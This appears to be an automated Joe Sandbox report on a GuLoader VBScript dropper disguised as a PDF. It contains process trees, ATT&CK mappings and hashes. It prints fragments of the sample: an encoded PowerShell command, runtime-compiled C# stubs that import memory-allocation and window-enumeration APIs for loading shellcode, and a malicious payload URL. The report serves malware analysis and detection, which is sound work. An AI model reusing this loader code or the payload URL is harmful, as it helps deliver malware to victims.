HQAcwBwACAAVABlAGsAbgBvAGsAcgBhADEAIAB0AHkAbgBkAHQAZgAgAEUAbABlAHYAdABpAG0AZQA2ACAAZAB5AGsAcwB2ACAAYgBvAG4AYgBvAG4AZQByAHMAIABhAG4AdABpAGMAYQBwAGkAdAAgAHUAbgBkAGUAcgAgAHYAaQBlAHIAIABZAEQARQBSAFAAIABLAGwAYgBlAGIAYQBhAG4AZAA5ACAAVgBpAHAAcwB0ADQAIABNAGEAeABpAG0AbwBuACAAQQBwAHAAcgBhAGkAcwBlADQAIABBAFIAVABJAEcARQBSACAADQAKACMAVQBEAFMASwBSAEkARABOACAAegBpAHQAYQBzACAAcwBwAGEAbgBrACAAVABpAHAAcABlAHIAaABvADYAIABzAGMAcgBvAGwAIABGAG4AaQBzAHIAIABGAFIAQQBTAEkARwBFACAAZABpAGUAdABpAGMAaQBhACAAaABhAGEAbgAgAFMAcABhAGEAbQBuAGQAcwAxACAAcwBlAHIAdgBpACAATABlAGQAcwBhAGcAZQBtAHUAIABVAG4AZABlAHIAawBlAG4AZAB0ADcAIABTAGEAbgBkAHAANAAgAGsAYQBwAHMAbABlAHIAYgBhAHMAIABkAGkAcwByACAAUABSAE8AUAAgAHIAbwBzAHMAZQAgAEYAbwByAGsAbABhADkAIAANAAoAIwBUAHIAYQBuAHMAaQBzAHQAbwByADEAIABXAEEAUgBEACAARABvAG0AcwBmAG8AMwAgAEIAQQBKAEEARABTAEUATgAgAEsAQQBSAEEASwBUAEUAUgBCACAAYwBoAGwAbwAgAEkAcwBvAGMAIABPAHIAbwBuAHQAaQB1AG0AMwAgAEUAcQB1AGkAcABwAGUANwAgAEUAcABpAGcAcgBhAG0AcgAgAE0AYQB0AHQAaQBzAHAAdQAgAFMAaABvAHAAcABpAG4AZwBlACAAUgBFAFQASQAgAEQARQBPAFIAUwBVAE0AVgAgAGEAbABtAHUAIABHAHIAYQB2AGgAdQAgAEYAbwByAHMAZwA4ACAAVABIAEkAUg
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wwh3pdnv\wwh3pdnv.cmdline
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESBAD5.tmp" "c:\Users\user\AppData\Local\Temp\wwh3pdnv\CSC196797DCDE8F47A0A151AAD0920D1B.TMP"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
    MITRE ATT&CK matrix (one row per line, cells separated by " | "; bracketed digits are the count badges the report shows beside a technique in that cell):

    Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
    Valid Accounts | Command and Scripting Interpreter [11] | Path Interception | Process Injection [11] | Masquerading [11] | OS Credential Dumping | Query Registry [1] | Remote Services | Archive Collected Data [1] | Exfiltration Over Other Network Medium | Encrypted Channel [1] | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
    Default Accounts | Scripting [221] | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion [21] | LSASS Memory | Security Software Discovery [1] | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Application Layer Protocol [1] | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
    Domain Accounts | PowerShell [2] | Logon Script (Windows) | Logon Script (Windows) | Process Injection [11] | Security Account Manager | Process Discovery [1] | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
    Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Deobfuscate/Decode Files or Information [1] | NTDS | Virtualization/Sandbox Evasion [21] | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
    Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting [221] | LSA Secrets | Application Window Discovery [1] | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
    Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information [12] | Cached Domain Credentials | File and Directory Discovery [1] | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
    External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | System Information Discovery [12] | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
    Behavior Graph (ID: 625179, Sample: doc_65398086_4190362045539...., Startdate: 12/05/2022, Architecture: WINDOWS, Score: 88)

    Signatures on the root node: Found malware configuration; Multi AV Scanner detection for submitted file; Yara detected GuLoader; 3 other signatures

    Process tree:
    • wscript.exe (started); signatures: Wscript starts Powershell (via cmd or directly); Very long command line found; Encrypted powershell cmdline option found
      • powershell.exe (started)
        • csc.exe (started); dropped: C:\Users\user\AppData\Local\...\wwh3pdnv.dll, PE32
          • cvtres.exe (started)
        • conhost.exe (started)

    Source | Detection | Scanner | Label | Link
    doc_65398086_4190362045539.pdf.vbs | 19% | Virustotal | | Browse
    doc_65398086_4190362045539.pdf.vbs | 20% | ReversingLabs | Script.Trojan.Valyria |
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    Source | Detection | Scanner | Label | Link
    https://vegproworld.com/wp-content/Medalj.vbs | 0% | Avira URL Cloud | safe |
    https://go.micro | 0% | URL Reputation | safe |
    No contacted domains info
    Name | Malicious | Antivirus Detection | Reputation
    https://vegproworld.com/wp-content/Medalj.vbs | true | Avira URL Cloud: safe | unknown
    Name | Source | Malicious | Antivirus Detection | Reputation
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 0000000E.00000002.885692627.0000000004571000.00000004.00000800.00020000.00000000.sdmp | false | | high
    https://go.micro | powershell.exe, 0000000E.00000002.887074953.0000000004809000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    No contacted IP infos
      Joe Sandbox Version:34.0.0 Boulder Opal
      Analysis ID:625179
      Start date and time: 12/05/2022 13:30:24 (2022-05-12 13:30:24 +02:00)
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 10m 34s
      Hypervisor based Inspection enabled:false
      Report type:light
      Sample file name:doc_65398086_4190362045539.pdf.vbs
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
      Number of new started processes analysed: 23
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal88.troj.evad.winVBS@8/9@0/0
      EGA Information:Failed
      HDC Information:Failed
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 0
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Found application associated with file extension: .vbs
      • Adjust boot time
      • Enable AMSI
      • Override analysis time to 240s for JS files taking high CPU consumption
      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
      • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, settings-win.data.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
      • Execution Graph export aborted for target powershell.exe, PID 5504 because it is empty
      • Not all processes were analyzed; the report is missing behavior information
      • Report size exceeded maximum capacity and may have missing behavior information.
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtProtectVirtualMemory calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      Time | Type | Description
      13:34:38 | API Interceptor | 25x Sleep call for process: powershell.exe modified
      No context
      No context
      No context
      No context
      No context
      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x496, 9 symbols
      Category:modified
      Size (bytes):1340
      Entropy (8bit):4.011609440700331
      Encrypted:false
      SSDEEP:24:HZK9oyiy25s+hZHXhKOLmfWI+ycuZhNdakSbPNnq9ed:1y05PZxKYm+1ulda3Rq9+
      MD5:35A06BF865E875C32B726828816967FD
      SHA1:69567D3C9C7E29E87231287DAA08C8C60D881A57
      SHA-256:F5A343919ECF1F8EA925B6C5EA94D82696B3ABB8896A251CE68992E1F623E31F
      SHA-512:2E148251EC07F729554628D576E41B452FDF80AF03E0AAECA367648B3F1415EDEED1C4D6DEFFC2D3A4579114C27C9885BB9713D043451F5F19FD19E79FB96E2C
      Malicious:false
      Reputation:low
      Preview:L...io}b.............debug$S........X...................@..B.rsrc$01........X.......<...........@..@.rsrc$02........P...F...............@..@........V....c:\Users\user\AppData\Local\Temp\wwh3pdnv\CSC196797DCDE8F47A0A151AAD0920D1B.TMP.................#O&W.....eg...k..........7.......C:\Users\user~1\AppData\Local\Temp\RESBAD5.tmp.-.<...................'...Microsoft (R) CVTRES.`.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...w.w.h.3.p.d.n.v...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:very short file (no magic)
      Category:dropped
      Size (bytes):1
      Entropy (8bit):0.0
      Encrypted:false
      SSDEEP:3:U:U
      MD5:C4CA4238A0B923820DCC509A6F75849B
      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
      Malicious:false
      Reputation:high, very likely benign file
      Preview:1
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:very short file (no magic)
      Category:dropped
      Size (bytes):1
      Entropy (8bit):0.0
      Encrypted:false
      SSDEEP:3:U:U
      MD5:C4CA4238A0B923820DCC509A6F75849B
      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
      Malicious:false
      Preview:1
      Process:C:\Windows\System32\wscript.exe
      File Type:data
      Category:modified
      Size (bytes):57933
      Entropy (8bit):7.415138518303065
      Encrypted:false
      SSDEEP:1536:pZVFWBYYoikwV2sLpHlqDhPf70u82ivgnOsQs:pJWkikwQbVPj0wnOi
      MD5:C550EC97DA0B49DE2EE31A4552D45484
      SHA1:EC31D87E64AB26A00D2E9796A2FAEE787BB32325
      SHA-256:37E778140A816131239F263E917234F92106C4F3EC55EAB1007D75E587815544
      SHA-512:D4CFA10342CD3E3C68976ADD3A538A7A5F3CA190C850A93F767B463E1697B212245602FDB2C0BA39BC6FD1C4C0F8C5B75388393A194AD85F392D0CD6FB683963
      Malicious:false
      Preview:......hG.3W.4$'..q.,$H.-&Z.._1..4..?@t@@@@9.u.W.......p.@t..........s..c........"[..1.4.I...T._.Ry..;.aR...8.............B..R..)....C.Hn.~uyw..%&..h.....GY....R.j..A.].k.~$....O.nNW..cZ..K\.1..,.....l....g.....<..j..k....v..U.1.!...y}`...:B.v.I-..>|4<....J....g.Z..F..!....&<.'.f'.r&.`".w..*......z....c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..cY}3.....c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c.I...S........<P........g......f...;%......6..8....f...w2...p..fJ.MH...X.&MR...#.._...Z......dR.a..8.?@t.?@MH...XN.t.?@..{&.S.50....E?@'"X.......{.!Lt.d.1..<......4f......&.[(/4..5.....=?@.*...T0.CE?@..j.a.Yy...d...=......@..H.k...g.I.?.1.....#.. .$.0.@t.zh....9..EFfp..(?@....t.?&.}...C?@,...u.?...c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c.....[m...>@t......C.].4d..w$..G.E.hN. .&NXP.)l.:4.,f.-?<%.1KPH...rz8.A.z3..
      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      File Type:MSVC .res
      Category:dropped
      Size (bytes):652
      Entropy (8bit):3.114364084100377
      Encrypted:false
      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry/ak7YnqqbPN5Dlq5J:+RI+ycuZhNdakSbPNnqX
      MD5:234F2657A7B1DDF2E56567D4D8BB876B
      SHA1:0CB26D0BA763B71C42D69F0819CFF1A1EE003ED5
      SHA-256:2A3BC5C84D045E37E336B2BFE2DCC4F00F5006FD754953C04C87685755054594
      SHA-512:E55530EB08E3945CEC11C8AEF5127A2A0914FDFAB9279710C6C3E3C53D5C956D18B57459E481B0807E88E766C185C02B7B422CFEFB4D194CF1674DAD752F3F75
      Malicious:false
      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...w.w.h.3.p.d.n.v...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...w.w.h.3.p.d.n.v...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
      Category:dropped
      Size (bytes):871
      Entropy (8bit):5.2974065929444025
      Encrypted:false
      SSDEEP:12:V/DGrbhQzPpN+RmgkrWeszPpN9zL2xgS2q5a+HNK+4tO+M6hOQLrOsG:JobSzeRmgkr7iFL2m7q5fHNyhjni
      MD5:B0C4D854DD730B30AEA1BD746BB6FBCD
      SHA1:8BC1444A76D62F0346DAD934B5FF66B6FAB20E81
      SHA-256:A06E857E542E86D49C3D292EE52EE7A26E90C9083486B8AC568D8739D65141F4
      SHA-512:505DB2A1FBDC8BB27C9B46D481F02E52CC7F02EC1A58CCF38ACD7D8780F48B94CE910B371A71B4502826C22B83B2BDA5827FF6E61259DCB484E2F27F9BAF409B
      Malicious:false
      Preview:.using System;..using System.Runtime.InteropServices;..public static class ROTATIONFO1..{..[DllImport("gdi32")]public static extern IntPtr EnumFontsA(string ferskva,uint parapleg,int DEPO,int ROTATIONFO0,int Hove,int afterrak,int Svinghjule1);..[DllImport("KERNEL32", EntryPoint="CreateFileA")]public static extern IntPtr Viac([MarshalAs(UnmanagedType.LPStr)]string ferskva,uint parapleg,int DEPO,int ROTATIONFO0,int Hove,int afterrak,int Svinghjule1);..[DllImport("ntdll")]public static extern int NtAllocateVirtualMemory(int ROTATIONFO6,ref Int32 TERRA,int Maniokp,ref Int32 ROTATIONFO,int Phonolo,int ROTATIONFO7);..[DllImport("KERNEL32", EntryPoint="ReadFile")]public static extern int CDAC(int Maniokp0,uint Maniokp1,IntPtr Maniokp2,ref Int32 Maniokp3,int Maniokp4);..[DllImport("USER32")]public static extern IntPtr EnumWindows(IntPtr Maniokp5,int Maniokp6);....}
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
      Category:dropped
      Size (bytes):377
      Entropy (8bit):5.2616699267879
      Encrypted:false
      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2cNwi23f6ULGzxs7+AEszIcNwi23f6ULQA:p37Lvkmb6KwZiUqWZEJZiUP
      MD5:53AC0DD9C318A4F8E7021C59049C92C1
      SHA1:4628E33182E6FB66285C07AF946931F12FAD2A1C
      SHA-256:C8A3ACFD09130D010F14F12DCEDB11A535F0CFF61B86A9EE0D6B524E6A55FCA1
      SHA-512:D22211B4B3B7029D63CE96C2B5DED3CD9B5332F7446D109B2B9588D8BB525496812143BA59E1FF898972ACC86DF1136A3D44EBEF024F825FC747B31077BDEF5A
      Malicious:false
      Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\wwh3pdnv\wwh3pdnv.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\wwh3pdnv\wwh3pdnv.0.cs"
      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
      Category:dropped
      Size (bytes):3584
      Entropy (8bit):3.265178097200224
      Encrypted:false
      SSDEEP:48:6NKIm4L9k7zqbiUcjaceNJ7U1Uf1ulda3RqK:4mEOeHozHvK7
      MD5:BDE0A74665E6E80624CD58A53D7A3B73
      SHA1:72B994DAE7F36145D546C5DBA9A5DA1E2C789069
      SHA-256:F92B9C20A23B6AD7B7FAFA196816023056AADC941D9753DB17D9918E324FF3F1
      SHA-512:820C04E2127B97B34C746BD0B2870690EFAD3964248091301DB6F61F98FFC38F1D7088ED4CC010F7DD6210D2FDBED599D6A8D00C807E8D78EA99738C07AF13CE
      Malicious:false
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...ho}b...........!.................%... ...@....... ....................................@.................................\%..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................%......H.......P ..............................................................BSJB............v4.0.30319......l.......#~..l.......#Strings............#US.........#GUID.......p...#Blob...........G5........%3................................................................3.,.................m.....m.......................................... :............ E............ J............ b.!.......... g.+.......s.....{................................ ..s.....{...............................
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
      Category:modified
      Size (bytes):879
      Entropy (8bit):5.303346583830233
      Encrypted:false
      SSDEEP:24:Kwqd3ka6KgiULEviU2KaM5DqBVKVrdFAMBJTH:xika67DEveKxDcVKdBJj
      MD5:6020EB7D0DD4DA84EC4EC4C6B1F94F44
      SHA1:DC98EF1DFDAC6A796689FB55A706643BACBF5939
      SHA-256:0F2441D62D336252CACCB2B7BA1164D161BAE35500571BFF85D35792D6176882
      SHA-512:74BE1AAE833E9B04DB6782E0947271CE2A5557AC54A3EB76538C87961CB45DB3EA327F0E748001450E760D095BA9C8D3D2184C0219A1042CF1764DEAD3FB49A0
      Malicious:false
      Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\wwh3pdnv\wwh3pdnv.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\wwh3pdnv\wwh3pdnv.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
      File type:ASCII text, with very long lines, with CRLF line terminators
      Entropy (8bit):4.492131037575922
      TrID:
      • Visual Basic Script (13500/0) 100.00%
      File name:doc_65398086_4190362045539.pdf.vbs
      File size:256454
      MD5:2fc6f3477035823ff7864187b5b2a5cc
      SHA1:8e6db7c18a5725e795d7421baf84cae637fbcc53
      SHA256:74e1b9fa91b0840706b7418b8604d76efab886fec1704b8810ad389aa6a9cb9b
      SHA512:5ae7e5d61f11123fe67841c99046ddad5f8b710a3054943c87acd53ed8438eb41fcf2a913f255e5dae3ea2aef1ce5373fe35897a0ee129b6471c2c11128e2ea7
      SSDEEP:3072:JZ4QJqxguxSEbvyZItIzvQd9EBHBD2WUZ0EZkBY42AjaNBQUkll0Z:JZ4GIgubKTcE2W+QY5jrQjllk
      TLSH:C6449B9182B1AFC891F93EDFCB0E8621B2409E65D3D7F1585AE110BD7FDB2E95306290
      File Content Preview:'Glanduli Tostprogra Spoor4 Altf horologi Beziq1 LITURGY driftsp GROVELLERS OBJURGATO SIPHUNCULU Definers4 skreknivho Badutspri Lote Pleuro spydspid Appl FLAMBERE BLATTOIDB Piete Nonsolub7 pale OSTRAC Farveat2 Stablev4 Skrkrom9 Donnerdse ..'BLOD Paikbi OB
      Icon Hash:e8d69ece869a9ec4
      No network behavior found


      Target ID:0
      Start time:13:31:38
      Start date:12/05/2022
      Path:C:\Windows\System32\wscript.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\doc_65398086_4190362045539.pdf.vbs"
      Imagebase:0x7ff634c70000
      File size:163840 bytes
      MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Target ID:14
      Start time:13:34:12
      Start date:12/05/2022
      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "# I n s t r u 9   S B E U R T E R N E   S l a n   S p o n t a n 7   U N C A L L   e m b o   r e i t   T a r p a p e   u g i f t e s d   B A C K S T A I R   e g o i t y h   S m e d   U R O G E N   v a s o r r h a p   A m e t r o   P A R A P H R A S T   K r y m m e l l o c 2   I N T E R S P I R   U n s q u e 6   j a c o b i t i s   P H O N O P H   A b s c o n d e r s 7   C h i k i t a o p s   S K Y G G   D O M M E D A G S   n o n a s s i s t a   A r c h c h e   t v i v   K a p r i f o l i   F i n a n s t i    
 # T r i p p e t s   M l k e 2   n o n e x p l o r   F O L K E C E   A r v e f l g e   F A S T P R I S S Y   H o g g w 6   R e p e t 4   H A L V O N K L E   A r b e j d s   P L O T T E R   T s e d    
 # D y n a m i k k e n 7   S T K Y S T T   H y d r o n i t 5   r e d i s t r i   m e r i c a r   v i p p   F a b r 1   F L O V M A   A A N D S H O   S t a a l s t u   J E S U I   T a n a   C o m m o   G u a p i n o   S y n k r o n 7   d e v l i n r e t   O m s t n i n g s g   R e s e 2   m e t r o l o   S U G E N E K D B O   S v i r p e t s u m 1   h y d r a t e r   O B S E R V A   T E M P A N A   V I K I N G E R   u p r i v e e k s   h e a r t b   E m b e d   U N A S S E N   O P K L A   e e b r e e r e   P i c r i t i c 3    
 # E E L I E S T   C r y s t a l o g 1   D U S I N M E   I n d i v 8   u d s k r i f t s p   T e k n o k r a 1   t y n d t f   E l e v t i m e 6   d y k s v   b o n b o n e r s   a n t i c a p i t   u n d e r   v i e r   Y D E R P   K l b e b a a n d 9   V i p s t 4   M a x i m o n   A p p r a i s e 4   A R T I G E R    
 # U D S K R I D N   z i t a s   s p a n k   T i p p e r h o 6   s c r o l   F n i s r   F R A S I G E   d i e t i c i a   h a a n   S p a a m n d s 1   s e r v i   L e d s a g e m u   U n d e r k e n d t 7   S a n d p 4   k a p s l e r b a s   d i s r   P R O P   r o s s e   F o r k l a 9    
 # T r a n s i s t o r 1   W A R D   D o m s f o 3   B A J A D S E N   K A R A K T E R B   c h l o   I s o c   O r o n t i u m 3   E q u i p p e 7   E p i g r a m r   M a t t i s p u   S h o p p i n g e   R E T I   D E O R S U M V   a l m u   G r a v h u   F o r s g 8   T H I R   L I T O G R A F R A   S t r a   d i s t r i   S P L I C E A B   g r i t m e d i   l s e a d g a   K A T A P U   m a n i   P a r e n t h o o   u d s v i    
 # S a m l i v s 5   a m b i   u r o o t w o s   R e s i s t i n g l 7   t r a n s p o r t a   s p e j l i n g   N A T I O N A L   E n d e v e n 6   R O L L E   U n i n t e l l 6   m o d e   S e c t i o n a l l 7   U n s e r 9   F e r r y s l o    
 # T A N D B R   f r i o   T i l l i d 7   P r o g y p 9   H A V E B R   m a u g e r a s s   b e m a l i n g c o   H e t e r o m o r p 2   S n a p r e   A B N E   L y s d d   U n d e r    
